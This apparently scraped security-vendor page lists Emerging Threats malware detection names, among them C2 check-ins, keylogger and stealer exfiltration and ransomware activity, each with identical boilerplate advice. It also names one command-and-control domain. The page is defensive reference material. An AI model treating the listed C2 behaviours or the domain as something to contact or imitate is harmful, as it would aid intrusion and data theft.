ET MALWARE Mal/Ransom-CE Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MASSLOGGER Client Data Exfil (POST) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MassLogger Client Exfil (POST) M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Matanbuchus Loader CnC M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matanbuchus Loader CnC M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matanbuchus Loader CnC M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matanbuchus Loader CnC M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Matanbuchus Loader Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matiex Keylogger Exfil Via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Matryoshka CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Matsnu Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Maze/ID Ransomware Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Mazilla Suspicious User-Agent Jan 15 2015

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Medfos Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Medfos/Midhos Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MedusaHTTP CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MedusaHTTP Variant CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MedusaHTTP Variant CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Megalodon/Gomorrah/CosaNostra HTTP Bot CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MegalodonHTTP CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MegalodonHTTP CoinMiner Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE MegalodonHTTP/LuciferHTTP Client Action

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Megumin v2 Stealer User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mekotio HTTP Method (111SA)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mera Keylogger POSTing keystrokes

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Meredrop/Nusump Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mermaid Ransomware Variant CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Mermaid Ransomware Variant CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Mermaid Ransomware Variant CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Mermaid Ransomware Variant CnC Activity M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Mespinoza Ransomware - Pre-Encryption File Exfil to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE METALJACK APT32 CnC Host Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mevade Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA CnC Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA CnC Domain Observed in SNI (samwinchester .club)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover Reporting Infected System Information and RAT Version

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover Response M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA HTTP Failover Response M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA Screenshot Upload M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA Screenshot Upload M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MICROPSIA Sending JPG Screenshot to CnC with .his Extension

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Midhos/Medfos downloader

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MilkyBoy CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MilkyBoy CnC Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MINEBRIDGE/MINEDOOR CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miniduke Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miniduke variant C&C activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miniduke Variant CnC Beacon via WebDAV

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Minirem

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirage Campaign checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Mirai Variant User-Agent (Outbound)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast KiXtart Downloader Client Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast KiXtart Downloader Client Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MirrorBlast KiXtart Downloader Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Miuref/Boaxxe Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ModPipe CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Moist Stealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MoneroPay Ransomware Payment Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Monsoon Tinytyphon CnC Beacon Exfiltrating Docs

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Monsoon Tinytyphon CnC Beacon GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE MontysThree HTTPTransport Module Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Moose CnC Request M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MosesStaff APT Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MRCR1 Ransomware Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MRCR1 Ransomware Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MS_D0wnl0ad3r Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MS_D0wnl0ad3r Screenshot Upload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.ATS CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.BIC Variant CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.DNL CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.DNL Server Response Task (whoami)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.TRM Checkin Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.TRM Data Exfil (sysinfo)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Agent.TRM Task Command

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Alcatrez Locker Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE MSIL/Almashreq CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Almashreq Executing New Processes

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL APT28 Zebrocy/Zekapab Reporting to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL APT28 Zebrocy/Zekapab Reporting to CnC M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Autorun.AD Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Azula Logger CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL.BackNet Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/BlackGuard Stealer Exfil Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/BlackGuard Stealer Variant Exfil via Telegram

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/Bobik CnC Traffic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE MSIL/CoalaBot CnC Activity

Description
Copy link

